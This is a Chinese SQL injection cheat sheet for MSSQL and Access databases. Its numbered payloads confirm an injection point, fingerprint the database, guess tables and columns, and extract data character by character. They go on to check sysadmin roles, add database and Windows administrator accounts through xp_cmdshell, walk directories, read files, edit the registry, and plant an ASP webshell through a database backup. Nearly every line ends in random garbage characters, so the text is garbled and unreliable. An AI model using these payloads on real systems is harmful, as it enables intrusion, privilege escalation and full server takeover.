1.判断是否有注入;and 1=1 ;and 1=2 2s`~<EF N
2.初步判断是否是mssql ;and user>0 tjDCfJx*
w}(Ht_6q{
3.注入参数是字符'and [查询条件] and ''=' }~NWOJ3;
{0} Q5
4.搜索时没过滤参数的'and [查询条件] and '%25'=' R8u9tTW
B}h8c
5.判断数据库系统 J#k.!]r,Y
S\118TpD
;and (select count(*) from sysobjects)>0 mssql rx(z::
q9m-d-!)
;and (select count(*) from msysobjects)>0 access ]K>x:vMKH
4
eP-yi
u*!/J R
upF^k%<y:
6.猜数据库 ;and (select Count(*) from [数据库名])>0 Dj{t[z]$k
A|0\ct
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 Ha!]*wg#
X;p4/ *U
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 8:Jc2K
nc>Ae`"(
9.(1)猜字段的ascii值(access) 6[C>"s}Ol
@{^6_n+gT%
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 E1rxuV|9
.l]w4Hf
(2)猜字段的ascii值(mssql) G2_l}q~
(L8z<id<z
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 O(44Dy@2
JclG*/Wjg4
10.测试权限结构(mssql) %-, -:e
~]lVixr9
8` f=Eh
P'CDV3+
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- .Vb\f
<<ifd?
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- zE4TdT1y|
vZ2/>}!Z=
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 4>8'.8S
tv7A&Z)Rh
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- iN@+,]Yjl
JlN<w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- T! fF1cpF\
gJI(d6
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- !T8h+3I
9^1.nE(R&
;and 1=(select IS_MEMBER('db_owner'));-- yBxWBW*e
nQ^<h.
[n;GP@A]R
|R$/oq
11.添加mssql和系统的帐户 .UJjB}4$f
Wfyap)y
;exec master.dbo.sp_addlogin username;-- 6):^m{RH^
;exec master.dbo.sp_password null,username,password;-- q6
Rr?
x*z$4)RP
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 92K#xM/
\A9hYTC)
;exec master.dbo.xp_cmdshell 'net user username password aY@st]p
lip1wR7
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ax+P)yz
h"+|)'*n
;exec master.dbo.xp_cmdshell 'net user username password /add';-- OQm-BL
LTc=D
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- h$y0>eMWs
s+yX82Y
C'jE'B5b
Qh.
:
N
12.(1)遍历目录 a6fqtkZ x
/6@Wm?`DB
;create table dirs(paths varchar(100), id int) H-aSLc
C~aNOe
WR
;insert dirs exec master.dbo.xp_dirtree 'c:\' }
h pTS_
[>tyx{T Ye
;and (select top 1 paths from dirs)>0 D%k]D/
^l"
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) {:r8X
c'r7sI%Yi
atO/Tp
!@[@xdV
(2)遍历目录 v"dj%75O?e
;\Vi~2!8
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Ohmi(s
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 nXuoRZ
27!9LU
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 #=B~}
_
w$5#jJX\
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 3d|n\!1r
:.
ja~Q
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 <MH| <hP
?YO$NYwE
=8F]cW'1`
SXx2
13.mssql中的存储过程 qc-4;m o
g [~"c}
xp_regenumvalues 注册表根键, 子键 a D,(mw-7r
f}1R,N_fC
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 +u:Q+PkM
pK~K>8\
xp_regread 根键,子键,键值名 |P"p/iY
_,JdL'[d
;exec xp_regread ` E2@GX+,
^SouA[
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 1Gojuey
y-iuOzq4
xp_regwrite 根键,子键, 值名, 值类型, 值 qs]7S^yw
$`&uu
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 C r~!N|(
,!RbFME&H
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 P|OjtI
,^UNQO*{GI
xp_regdeletevalue 根键,子键,值名 `/mcjKQ&9y
iYJzSVO
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 do:3aP'S,
Ws;}D}+
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 J c~{ E
/Af:{|'$%
q!
+?
mqg[2VTRP
14.mssql的backup创建webshell [o=v"s't)
^sNj[%I
R
use model 9)a:8/Y
/k(KA [bS
create table cmd(str image); uZ-yu|1
6-@
X
insert into cmd(str) values (''); Y!6,ty'
9Xg+$/
backup database model to disk='c:\l.asp'; m};Qng]
'o#ve72z1
<XV\8Y+n
d +Vx:`tT
15.mssql内置函数 :{d?B$
$Y!$I.+
;and (select @@version)>0 获得Windows的版本号 _[,oP s:+
W7a aL
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 1{sf Dw[s
/OpVr15
;and (select user_name())>0 爆当前系统的连接用户 zd+_
BPT
;MqH)M
;and (select db_name())>0 得到当前连接的数据库 ly<1]jK
Q_bF^4gt
,h'q}5
e)[>E\u _
16.简洁的webshell j z aC
V(%L}0[]
use model Z2]ySyt]
`2X#;{a:
create table cmd(str image); lqO"
{o?+T);Z
insert into cmd(str) values (''); HrUQ X4
D|u! KH
backup database model to disk='g:\wwwtest\l.asp';